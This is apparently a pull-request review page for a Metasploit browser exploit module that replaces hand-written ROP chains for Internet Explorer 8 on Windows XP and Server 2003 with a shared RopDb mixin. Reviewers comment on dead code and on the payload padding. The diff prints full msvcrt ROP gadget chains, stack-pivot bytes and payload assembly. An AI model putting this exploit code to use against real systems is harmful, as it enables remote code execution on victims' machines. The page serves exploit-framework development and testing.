[SeeRM 8458] Use RopDb mixin for browser exploits #2483
Changes from 5 commits
e016c9a
aea6313
67228ba
7222e3c
f4000d3
1e3b84d
|
@@ -117,77 +117,23 @@ def get_target(agent) | |
def get_payload(t, cli) | ||
rop_payload = '' | ||
|
||
# Extra junk in the end to make sure post code execution is stable. | ||
p = payload.encoded | ||
p << rand_text_alpha(12000) | ||
|
||
case t['Rop'] | ||
when :msvcrt | ||
algin = "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500 | ||
chain = '' | ||
|
||
align = "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500 | ||
rop_payload = '' | ||
if t.name == 'IE 8 on Windows XP SP3' | ||
chain = | ||
[ | ||
0x77c1e844, # POP EBP # RETN [msvcrt.dll] | ||
0x77c1e844, # skip 4 bytes [msvcrt.dll] | ||
0x77c4fa1c, # POP EBX # RETN [msvcrt.dll] | ||
0xffffffff, | ||
0x77c127e5, # INC EBX # RETN [msvcrt.dll] | ||
0x77c127e5, # INC EBX # RETN [msvcrt.dll] | ||
0x77c4e0da, # POP EAX # RETN [msvcrt.dll] | ||
0x2cfe1467, # put delta into eax (-> put 0x00001000 into edx) | ||
0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll] | ||
0x77c58fbc, # XCHG EAX,EDX # RETN [msvcrt.dll] | ||
0x77c34fcd, # POP EAX # RETN [msvcrt.dll] | ||
0x2cfe04a7, # put delta into eax (-> put 0x00000040 into ecx) | ||
0x77c4eb80, # ADD EAX,75C13B66 # ADD EAX,5D40C033 # RETN [msvcrt.dll] | ||
0x77c14001, # XCHG EAX,ECX # RETN [msvcrt.dll] | ||
0x77c3048a, # POP EDI # RETN [msvcrt.dll] | ||
0x77c47a42, # RETN (ROP NOP) [msvcrt.dll] | ||
0x77c46efb, # POP ESI # RETN [msvcrt.dll] | ||
0x77c2aacc, # JMP [EAX] [msvcrt.dll] | ||
0x77c3b860, # POP EAX # RETN [msvcrt.dll] | ||
0x77c1110c, # ptr to &VirtualAlloc() [IAT msvcrt.dll] | ||
0x77c12df9, # PUSHAD # RETN [msvcrt.dll] | ||
0x77c35459 # ptr to 'push esp # ret ' [msvcrt.dll] | ||
].pack("V*") | ||
|
||
rop_payload = generate_rop_payload('msvcrt', p, {'target'=>'xp'}) | ||
it should be:
|
||
elsif t.name == 'IE 8 on Windows Server 2003' | ||
junk = rand_text_alpha(4).unpack("V")[0].to_i | ||
nop = make_nops(4).unpack("V")[0].to_i | ||
|
||
chain = | ||
[ | ||
0x77bb2563, # POP EAX # RETN | ||
0x77ba1114, # <- *&VirtualProtect() | ||
0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN | ||
junk, | ||
0x77bb0c86, # XCHG EAX,ESI # RETN | ||
0x77bc9801, # POP EBP # RETN | ||
0x77be2265, # ptr to 'push esp # ret' | ||
0x77bb2563, # POP EAX # RETN | ||
0x03C0990F, | ||
0x77bdd441, # SUB EAX, 03c0940f (dwSize, 0x500 -> ebx) | ||
0x77bb48d3, # POP EBX, RET | ||
0x77bf21e0, # .data | ||
0x77bbf102, # XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN | ||
0x77bbfc02, # POP ECX # RETN | ||
0x77bef001, # W pointer (lpOldProtect) (-> ecx) | ||
0x77bd8c04, # POP EDI # RETN | ||
0x77bd8c05, # ROP NOP (-> edi) | ||
0x77bb2563, # POP EAX # RETN | ||
0x03c0984f, | ||
0x77bdd441, # SUB EAX, 03c0940f | ||
0x77bb8285, # XCHG EAX,EDX # RETN | ||
0x77bb2563, # POP EAX # RETN | ||
nop, | ||
0x77be6591 # PUSHAD # ADD AL,0EF # RETN | ||
].pack("V*") | ||
rop_payload = generate_rop_payload('msvcrt', p, {'target'=>'2003'}) | ||
it should be:
|
||
end | ||
|
||
rop_payload = chain + algin + payload.encoded | ||
|
||
else | ||
code = "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000 | ||
code << payload.encoded | ||
code << rand_text_alpha(12000) | ||
code << p | ||
It should be:
But honestly I don't know why this big rand_text_alpha is needed in the "java" case. I guess it tries to let the exploit stack-pivot more reliably, but I'm not sure it's the best way. |
||
|
||
rop_payload = generate_rop_payload('java', code) | ||
end | ||
|
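Review bot: The `align` stack-adjustment string in the `:msvcrt` branch is now dead code — it is assigned right after `when :msvcrt` but nothing on the new side references it, since the `chain + align + payload.encoded` concatenation was dropped in favour of `generate_rop_payload`, and the `rop_payload = ''` directly below it merely repeats the initialisation at the top of the method. If `generate_rop_payload('msvcrt', ...)` already emits its own stack adjustment/pivot (not visible in this hunk — worth confirming in the RopDb mixin), both lines should go; if it does not, the `add esp, -3500` still has to be prepended or passed explicitly, otherwise the msvcrt targets land on an unadjusted stack. The `if`/`elsif` on `t.name` also has no `else`, so an `:msvcrt` target with any other name silently yields an empty `rop_payload` instead of failing — a `fail_with`/`raise` in a final `else` would make that loud and keep the two target-name strings in one place. `get_payload`'s body continues past the end of the hunk.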
It's not needed always, shouldn't be done here.